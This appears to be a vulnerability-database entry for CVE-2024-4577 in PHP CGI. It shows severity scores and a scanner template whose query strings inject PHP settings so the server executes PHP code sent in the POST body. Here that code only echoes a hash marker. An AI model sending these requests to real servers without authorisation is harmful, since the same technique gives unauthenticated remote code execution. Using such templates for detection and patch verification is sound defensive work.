9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.7 High
AI Score
Confidence
High
0.967 High
EPSS
Percentile
99.7%
PHP CGI - Argument Injection (CVE-2024-4577) is a critical argument injection flaw in PHP.
id: CVE-2024-4577
info:
name: PHP CGI - Argument Injection
author: Hรผseyin TINTAล,sw0rk17,securityforeveryone,pdresearch
severity: critical
description: |
PHP CGI - Argument Injection (CVE-2024-4577) is a critical argument injection flaw in PHP.
impact: |
Successful exploitation could lead to remote code execution on the affected system.
remediation: |
Apply the vendor-supplied patches or upgrade to a non-vulnerable version.
metadata:
verified: true
tags: cve,cve2024,php,cgi,rce
http:
- method: POST
path:
- "{{BaseURL}}/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
- "{{BaseURL}}/index.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
- "{{BaseURL}}/test.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
- "{{BaseURL}}/test.hello?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
body: |
<?php echo md5("CVE-2024-4577"); ?>
stop-at-first-match: true
matchers:
- type: word
part: body
words:
- "3f2ba4ab3b260f4c2dc61a6fac7c3e8a"
# digest: 4a0a004730450221008693eaa1040ef5b904550b0ec8d707667e4de37c2f03bcfb4cb631137ed90caf02203b9468a518628678b56886433cd50d65153bb54d66ac540ef0b535407471c01c:922c64590222798bb761d5b6d8e72950
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.7 High
AI Score
Confidence
High
0.967 High
EPSS
Percentile
99.7%